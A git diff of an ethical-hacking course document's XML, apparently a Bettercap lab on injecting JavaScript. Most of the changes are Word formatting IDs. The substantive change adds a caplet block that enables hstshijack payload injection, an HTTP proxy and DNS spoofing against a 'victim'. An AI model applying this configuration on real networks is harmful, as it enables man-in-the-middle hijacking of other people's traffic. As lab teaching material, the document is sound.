+      <w:t>20</w:t>
     </w:r>
     <w:r>
       <w:t>/202</w:t>
@@ -2210,7 +2699,7 @@
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="00446AFF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="8AF6A196"/>
+    <w:tmpl w:val="4170D888"/>
     <w:lvl w:ilvl="0" w:tplc="0409000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -7676,154 +8165,154 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1" w16cid:durableId="140968439">
+  <w:num w:numId="1" w16cid:durableId="1101494416">
     <w:abstractNumId w:val="27"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="157229289">
+  <w:num w:numId="2" w16cid:durableId="1372924740">
     <w:abstractNumId w:val="30"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="2103720266">
+  <w:num w:numId="3" w16cid:durableId="259457108">
     <w:abstractNumId w:val="33"/>
   </w:num>
-  <w:num w:numId="4" w16cid:durableId="1929072024">
+  <w:num w:numId="4" w16cid:durableId="523636289">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="5" w16cid:durableId="729156905">
+  <w:num w:numId="5" w16cid:durableId="1569461745">
     <w:abstractNumId w:val="22"/>
   </w:num>
-  <w:num w:numId="6" w16cid:durableId="120811401">
+  <w:num w:numId="6" w16cid:durableId="344747808">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="7" w16cid:durableId="2097289574">
+  <w:num w:numId="7" w16cid:durableId="228926796">
     <w:abstractNumId w:val="24"/>
   </w:num>
-  <w:num w:numId="8" w16cid:durableId="1397120615">
+  <w:num w:numId="8" w16cid:durableId="1488479867">
     <w:abstractNumId w:val="49"/>
   </w:num>
-  <w:num w:numId="9" w16cid:durableId="1440562585">
+  <w:num w:numId="9" w16cid:durableId="539822569">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="10" w16cid:durableId="885795250">
+  <w:num w:numId="10" w16cid:durableId="655688631">
     <w:abstractNumId w:val="44"/>
   </w:num>
-  <w:num w:numId="11" w16cid:durableId="1960916184">
+  <w:num w:numId="11" w16cid:durableId="1356495933">
     <w:abstractNumId w:val="16"/>
   </w:num>
-  <w:num w:numId="12" w16cid:durableId="2104720482">
+  <w:num w:numId="12" w16cid:durableId="256063376">
     <w:abstractNumId w:val="31"/>
   </w:num>
-  <w:num w:numId="13" w16cid:durableId="2113276881">
+  <w:num w:numId="13" w16cid:durableId="450173360">
     <w:abstractNumId w:val="13"/>
   </w:num>
-  <w:num w:numId="14" w16cid:durableId="1428304400">
+  <w:num w:numId="14" w16cid:durableId="1695378995">
     <w:abstractNumId w:val="12"/>
   </w:num>
-  <w:num w:numId="15" w16cid:durableId="2111658400">
+  <w:num w:numId="15" w16cid:durableId="1867138058">
     <w:abstractNumId w:val="38"/>
   </w:num>
-  <w:num w:numId="16" w16cid:durableId="1220215945">
+  <w:num w:numId="16" w16cid:durableId="1405687785">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="17" w16cid:durableId="1183591547">
+  <w:num w:numId="17" w16cid:durableId="195852412">
     <w:abstractNumId w:val="39"/>
   </w:num>
-  <w:num w:numId="18" w16cid:durableId="1998537264">
+  <w:num w:numId="18" w16cid:durableId="1705322964">
     <w:abstractNumId w:val="42"/>
   </w:num>
-  <w:num w:numId="19" w16cid:durableId="1992640144">
+  <w:num w:numId="19" w16cid:durableId="618418792">
     <w:abstractNumId w:val="36"/>
   </w:num>
-  <w:num w:numId="20" w16cid:durableId="644509092">
+  <w:num w:numId="20" w16cid:durableId="358512511">
     <w:abstractNumId w:val="32"/>
   </w:num>
-  <w:num w:numId="21" w16cid:durableId="1958097870">
+  <w:num w:numId="21" w16cid:durableId="1996060090">
     <w:abstractNumId w:val="48"/>
   </w:num>
-  <w:num w:numId="22" w16cid:durableId="1997874750">
+  <w:num w:numId="22" w16cid:durableId="1063066083">
     <w:abstractNumId w:val="19"/>
   </w:num>
-  <w:num w:numId="23" w16cid:durableId="1070419895">
+  <w:num w:numId="23" w16cid:durableId="1142381444">
     <w:abstractNumId w:val="23"/>
   </w:num>
-  <w:num w:numId="24" w16cid:durableId="579102190">
+  <w:num w:numId="24" w16cid:durableId="126972947">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="25" w16cid:durableId="271326662">
+  <w:num w:numId="25" w16cid:durableId="1570116804">
     <w:abstractNumId w:val="20"/>
   </w:num>
-  <w:num w:numId="26" w16cid:durableId="204607704">
+  <w:num w:numId="26" w16cid:durableId="1097750099">
     <w:abstractNumId w:val="41"/>
   </w:num>
-  <w:num w:numId="27" w16cid:durableId="720833307">
+  <w:num w:numId="27" w16cid:durableId="1515269691">
     <w:abstractNumId w:val="45"/>
   </w:num>
-  <w:num w:numId="28" w16cid:durableId="964651499">
+  <w:num w:numId="28" w16cid:durableId="584075480">
     <w:abstractNumId w:val="10"/>
   </w:num>
-  <w:num w:numId="29" w16cid:durableId="568737450">
+  <w:num w:numId="29" w16cid:durableId="1736464123">
     <w:abstractNumId w:val="47"/>
   </w:num>
-  <w:num w:numId="30" w16cid:durableId="790631812">
+  <w:num w:numId="30" w16cid:durableId="1605454552">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="31" w16cid:durableId="725641418">
+  <w:num w:numId="31" w16cid:durableId="1499880532">
     <w:abstractNumId w:val="46"/>
   </w:num>
-  <w:num w:numId="32" w16cid:durableId="262688353">
+  <w:num w:numId="32" w16cid:durableId="2103449153">
     <w:abstractNumId w:val="28"/>
   </w:num>
-  <w:num w:numId="33" w16cid:durableId="248081481">
+  <w:num w:numId="33" w16cid:durableId="1846556395">
     <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="34" w16cid:durableId="674840822">
+  <w:num w:numId="34" w16cid:durableId="789782466">
     <w:abstractNumId w:val="9"/>
   </w:num>
-  <w:num w:numId="35" w16cid:durableId="386955994">
+  <w:num w:numId="35" w16cid:durableId="1436287995">
     <w:abstractNumId w:val="26"/>
   </w:num>
-  <w:num w:numId="36" w16cid:durableId="1423181829">
+  <w:num w:numId="36" w16cid:durableId="355690776">
     <w:abstractNumId w:val="37"/>
   </w:num>
-  <w:num w:numId="37" w16cid:durableId="831722573">
+  <w:num w:numId="37" w16cid:durableId="746655920">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="38" w16cid:durableId="1321427754">
+  <w:num w:numId="38" w16cid:durableId="1353801147">
     <w:abstractNumId w:val="43"/>
   </w:num>
-  <w:num w:numId="39" w16cid:durableId="433405663">
+  <w:num w:numId="39" w16cid:durableId="348529813">
     <w:abstractNumId w:val="25"/>
   </w:num>
-  <w:num w:numId="40" w16cid:durableId="1128549421">
+  <w:num w:numId="40" w16cid:durableId="153497936">
     <w:abstractNumId w:val="11"/>
   </w:num>
-  <w:num w:numId="41" w16cid:durableId="2132624882">
+  <w:num w:numId="41" w16cid:durableId="35587053">
     <w:abstractNumId w:val="35"/>
   </w:num>
-  <w:num w:numId="42" w16cid:durableId="1314916959">
+  <w:num w:numId="42" w16cid:durableId="1500581598">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="43" w16cid:durableId="937104206">
+  <w:num w:numId="43" w16cid:durableId="102383182">
     <w:abstractNumId w:val="34"/>
   </w:num>
-  <w:num w:numId="44" w16cid:durableId="650014156">
+  <w:num w:numId="44" w16cid:durableId="1616139268">
     <w:abstractNumId w:val="40"/>
   </w:num>
-  <w:num w:numId="45" w16cid:durableId="1790852872">
+  <w:num w:numId="45" w16cid:durableId="1857621978">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="46" w16cid:durableId="2014674315">
+  <w:num w:numId="46" w16cid:durableId="922300234">
     <w:abstractNumId w:val="15"/>
   </w:num>
-  <w:num w:numId="47" w16cid:durableId="1221787987">
+  <w:num w:numId="47" w16cid:durableId="1830245486">
     <w:abstractNumId w:val="21"/>
   </w:num>
-  <w:num w:numId="48" w16cid:durableId="235360263">
+  <w:num w:numId="48" w16cid:durableId="663165830">
     <w:abstractNumId w:val="18"/>
   </w:num>
-  <w:num w:numId="49" w16cid:durableId="77362206">
+  <w:num w:numId="49" w16cid:durableId="2115513142">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="50" w16cid:durableId="1149593788">
+  <w:num w:numId="50" w16cid:durableId="82383969">
     <w:abstractNumId w:val="29"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="6"/>
@@ -8228,7 +8717,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:spacing w:before="160" w:after="80" w:line="336" w:lineRule="auto"/>
     </w:pPr>
@@ -8244,7 +8733,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading1Char"/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:keepNext/>
       <w:spacing w:before="400" w:after="200" w:line="240" w:lineRule="auto"/>
@@ -8264,7 +8753,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading2Char"/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:keepNext/>
       <w:pBdr>
@@ -8288,7 +8777,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:keepNext/>
       <w:autoSpaceDE w:val="0"/>
@@ -8307,8 +8796,9 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
@@ -8330,7 +8820,7 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
     <w:name w:val="Heading 3 Char"/>
@@ -8415,7 +8905,7 @@
     <w:name w:val="footer"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="FooterChar"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:pBdr>
         <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
@@ -8445,7 +8935,7 @@
     <w:name w:val="header"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="HeaderChar"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="left" w:pos="5040"/>
@@ -8470,7 +8960,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Outlinenumbering">
     <w:name w:val="Outline numbering"/>
     <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="1"/>
@@ -8488,7 +8978,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumberedHeading2">
     <w:name w:val="Numbered Heading 2"/>
     <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="2"/>
@@ -8498,12 +8988,12 @@
   <w:style w:type="character" w:styleId="PageNumber">
     <w:name w:val="page number"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
   </w:style>
   <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
@@ -8511,7 +9001,7 @@
   </w:style>
   <w:style w:type="character" w:styleId="FollowedHyperlink">
     <w:name w:val="FollowedHyperlink"/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:rPr>
       <w:color w:val="800080"/>
       <w:u w:val="single"/>
@@ -8522,7 +9012,7 @@
     <w:basedOn w:val="Normal"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:ind w:left="720"/>
     </w:pPr>
@@ -8534,7 +9024,7 @@
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:keepLines/>
       <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
@@ -8551,7 +9041,7 @@
     <w:name w:val="Code"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:spacing w:before="80" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -8566,7 +9056,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -8578,7 +9068,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
       <w:ind w:left="202"/>
@@ -8592,7 +9082,7 @@
     <w:uiPriority w:val="39"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="000D4AE6"/>
+    <w:rsid w:val="00101052"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
       <w:ind w:left="403"/>
@@ -8953,8 +9443,10 @@
     <w:rsid w:val="003A178B"/>
     <w:rsid w:val="004C17B1"/>
     <w:rsid w:val="00775E7E"/>
+    <w:rsid w:val="00A1734E"/>
     <w:rsid w:val="00BF4911"/>
     <w:rsid w:val="00C416DA"/>
+    <w:rsid w:val="00DB1B74"/>
     <w:rsid w:val="00F32149"/>
     <w:rsid w:val="00F47EFD"/>
     <w:rsid w:val="00F91ECC"/>

--- a/Ethical_Hacking/Bettercap/4.Bettercap_Injecting_Javascript.docx
+++ b/Ethical_Hacking/Bettercap/4.Bettercap_Injecting_Javascript.docx
@@ -9,7 +9,7 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc190961505"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc190963935"/>
       <w:r>
         <w:t>Bettercap</w:t>
       </w:r>
@@ -76,7 +76,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc190961505" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963935" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -103,7 +103,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961505 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963935 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -148,7 +148,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961506" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963936" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -175,7 +175,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961506 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963936 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -220,7 +220,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961507" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963937" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -247,7 +247,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961507 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963937 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -292,7 +292,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961508" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963938" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -319,7 +319,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961508 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963938 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -364,7 +364,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961509" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963939" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -391,7 +391,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961509 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963939 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -436,7 +436,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961510" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963940" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -463,7 +463,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961510 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963940 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -508,7 +508,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961511" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963941" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -535,7 +535,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961511 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963941 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -580,7 +580,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961512" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963942" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -607,7 +607,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961512 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963942 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -652,7 +652,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961513" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963943" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -679,7 +679,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961513 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963943 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -724,7 +724,7 @@
               <w14:ligatures w14:val="standardContextual"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc190961514" w:history="1">
+          <w:hyperlink w:anchor="_Toc190963944" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -751,7 +751,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc190961514 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc190963944 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -816,7 +816,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc190961506"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc190963936"/>
       <w:r>
         <w:t>Lab Requirements</w:t>
       </w:r>
@@ -885,7 +885,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc190961507"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc190963937"/>
       <w:r>
         <w:t>Update Kali Linux</w:t>
       </w:r>
@@ -934,7 +934,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc190961508"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc190963938"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Install or </w:t>
@@ -1214,7 +1214,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc190961509"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc190963939"/>
       <w:r>
         <w:t>Injecting JavaScript</w:t>
       </w:r>
@@ -1299,7 +1299,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="5" w:name="_Toc190778058"/>
-      <w:bookmarkStart w:id="6" w:name="_Toc190961510"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc190963940"/>
       <w:r>
         <w:t>1</w:t>
       </w:r>
@@ -1527,7 +1527,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc190961511"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc190963941"/>
       <w:r>
         <w:t>2</w:t>
       </w:r>
@@ -1768,7 +1768,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc190961512"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc190963942"/>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
       </w:r>
@@ -1953,7 +1953,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc190961513"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc190963943"/>
       <w:r>
         <w:t>4</w:t>
       </w:r>
@@ -2188,6 +2188,17 @@
             <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t># Add this to the end of the set hstshijack.payloads path</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
             <w:r>
               <w:t>,</w:t>
             </w:r>
@@ -2199,6 +2210,77 @@
             </w:r>
             <w:r>
               <w:t>/home/user/alert.js</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t># Comment the following lines out as shown</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t># net.recon on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>set http.proxy.script  /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>http.proxy on</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t># set dns.spoof.domains  google.corn,*.google.corn,gstatic.corn,*.gstatic.corn</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t># set dns.spoof.all      true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Code"/>
+            </w:pPr>
+            <w:r>
+              <w:t>dns.spoof on</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2357,6 +2439,7 @@
             </w:pPr>
             <w:bookmarkStart w:id="10" w:name="_Hlk84050432"/>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve">sudo </w:t>
             </w:r>
             <w:r>
@@ -2511,7 +2594,6 @@
     </w:sdt>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">You have successfully spoofed your victim </w:t>
       </w:r>
       <w:r>
@@ -2553,7 +2635,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc190961514"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc190963944"/>
       <w:r>
         <w:t>Assignment Submission</w:t>
       </w:r>
@@ -8717,7 +8799,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:spacing w:before="160" w:after="80" w:line="336" w:lineRule="auto"/>
     </w:pPr>
@@ -8733,7 +8815,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading1Char"/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:keepNext/>
       <w:spacing w:before="400" w:after="200" w:line="240" w:lineRule="auto"/>
@@ -8753,7 +8835,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading2Char"/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:keepNext/>
       <w:pBdr>
@@ -8777,7 +8859,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:qFormat/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:keepNext/>
       <w:autoSpaceDE w:val="0"/>
@@ -8798,7 +8880,7 @@
     <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
@@ -8820,7 +8902,7 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
     <w:name w:val="Heading 3 Char"/>
@@ -8905,7 +8987,7 @@
     <w:name w:val="footer"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="FooterChar"/>
-    <w:rsid w:val="00101052"/>
+    <w:rsid w:val="00CD7F55"/>
     <w:pPr>
       <w:pBdr>
         <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
@@ -8935,7 +9017,7 @@
     <w:name w:val="header"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="HeaderChar"/>
